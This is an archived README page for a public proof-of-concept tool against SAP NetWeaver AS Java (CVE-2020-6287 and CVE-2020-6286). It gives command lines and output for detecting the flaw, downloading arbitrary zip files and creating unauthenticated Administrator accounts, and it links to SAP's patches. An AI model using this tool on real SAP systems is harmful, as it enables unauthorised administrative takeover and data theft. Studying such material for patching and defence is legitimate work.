Related vulnerability
Title:
SAP NetWeaver AS JAVA authorization vulnerability
(CVE-2020-6287)
Description: SAP NetWeaver is a service-oriented integrated application platform from the German company SAP. The platform mainly provides a development and runtime environment for SAP applications. SAP NetWeaver Application Server (AS) Java is a Java-based application server that runs inside NetWeaver. An authorization vulnerability exists in SAP NetWeaver AS JAVA (LM Configuration Wizard); it stems from the program not performing an authentication check. An attacker can exploit this vulnerability to perform configuration tasks and carry out critical operations on an SAP Java system, including creating admin
Description
PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
Introduction
PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
~~Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Guys, really? That was the best codename you came up with? :)~~
This script checks for the SAP LM Configuration Wizard missing authorization check vulnerability and, as a PoC, exploits the directory traversal in the `queryProtocol` method.
The directory traversal allows downloading any `zip` file from the SAP server.
***This project is created only for educational purposes and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project.***
Original finding:
CVE-2020-6287: [Pablo Artuso](https://twitter.com/lmkalg)<br>
CVE-2020-6286: [Yvan 'iggy' G.](https://twitter.com/_1ggy)
Solution: [#2934135](https://launchpad.support.sap.com/#/notes/2934135), [#2939665](https://launchpad.support.sap.com/#/notes/2939665)
# How to use
Just point the script at the SAP NW AS Java hostname/IP.
There are additional options:
1. `-c` - check whether the SAP server is vulnerable to RECON
2. `-f` - download a `zip` file from the SAP server
3. `-u` - create an SAP JAVA user with the `Authenticated User` role
4. `-a` - create an SAP JAVA user with the `Administrator` role
Ex.: Download zip file
```
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
```
Ex.: Create SAP JAVA user
```
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
```
Ex.: Create SAP JAVA Administrator user
```
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
```
## All options
```
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode
```
File snapshot
[4.0K] /data/pocs/95252b9abec1e9fdf8610d3fbeb7416f80252065
├── [3.2K] README.md
└── [9.7K] RECON.py
0 directories, 2 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.